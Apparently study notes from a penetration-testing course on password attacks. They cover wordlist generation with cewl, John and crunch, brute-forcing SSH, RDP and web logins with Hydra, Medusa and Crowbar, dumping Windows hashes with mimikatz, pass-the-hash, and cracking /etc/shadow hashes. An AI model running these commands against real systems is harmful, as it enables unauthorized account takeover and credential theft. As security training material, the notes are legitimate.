19.PA-Password-Attacks

## Wordlists Save more time at the expense of low coverage. Try the most possible passwords. `/usr/share/wordlists` ### Standard Wordlists To create custom password lists ```bash cewl --help | less cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt # scrape website, search for words with at least 6 chars and write them to a txt ``` Use **John** to create different styles of passwords ```bash sudo nano /etc/john/john.conf # find [List.Rules:WordList] # set some rules, such as adding 2 digits at the end of each password $[0-9]$[0-9] john --wordlis=megacorp-cewl.txt --rules --stdout > mutate.txt ``` ### Brute Force Wordlists Test every password combinations. #### Generate brute force passwords in a certain pattern to save time with 'crunch' | Placeholder | Character Translation | | ----------- | ---------------------------------- | | @ | Lower case alpha characters | | , | Uppercase alpha characters | | % | Numeric characters | | ^ | Special characters including space | ```bash crunch 8 8 -t ,@@^^%%% # generate pwd with min and max length of 8 chars, -t to specify pattern crunch 4 6 0123456789ABCDEF -o crunch.txt # use only some characters # /usr/share/crunch/charset.lst generate pwd with predefined char sets crunch 4 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch.txt # choose char set, and mixalpha for upper/lower letters ``` ## Common Network Service Attack Methods ### HTTP htaccess Attack with Medusa ```bash medusa -h <HOST IP> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin ``` ### Remote Desktop Protocol Attack with Crowbar ```bash sudo apt install crowbar crowbar -b rdp -s <HOST IP> -u admin -C <password file> -n 1 # -b for protocol, -n for number of thread ``` ### SSH Attack with THC-Hydra ```bash # -l target username # -P Wordlist # protocol://IP protocol and IP address hydra -l kali -P <pwd file> ssh:<IP> ``` ### HTTP POST Attack with THC-Hydra ```bash hydra http-form-post -U | less # provide more arguments for a form # look at web page source code first for understanding how a form looks like hydra <IP> http-form-post "/form/frontpage.php:user=admin&pass=^PASS^:INVALID LOGIN" -l admin -P <pwd file> -vV -f # -f for: stop after first success ``` ## Leveraging Password Hashes ### Retrieving Password Hashes ```bash hashid "<hash>" # analyze hash ``` Use mimikatz to retrieve pwd hashes from windows ```powershell # Within mimikatz privilege::debug token::elevate # elevate from high integrity to system integrity lsadump::sam # dump hashes ``` ### Passing the Hash in Windows Use hash to authenticate instead of clear text password. Since Windows doesn't use salt with hashes, the hashes are static. So if 2 machines has the same username and password, you could use the hash of one machine to login to the other. ```bash pth-winexe -U <USERNAME>%<HASH> //<IP> cmd ``` ### Password Cracking Process of recovering the clear text of a password given its hashed form. ```bash # windows hashes john hash.txt --format=NT john --wordlist=<word list> hash.txt --format=NT john --rules --wordlist=<word list> hash.txt --format=NT # linux cracking grep <username> /etc/passwd > pwd-file.txt sudo grep <username> /etc/shadow > shadow-file.txt unshadow pwd-file.txt shadow-file.txt > unshadowed.txt john --rules --wordlist=<rockyou.txt> unshadowed.txt # --fork to multithread on older versions, default in new versions # --node distribute load on multiple computers ``` John is limited by CPU speed. [https://hashcat.net](https://hashcat.net): use GPU. [https://hashcat.net/wiki/](https://hashcat.net/wiki/)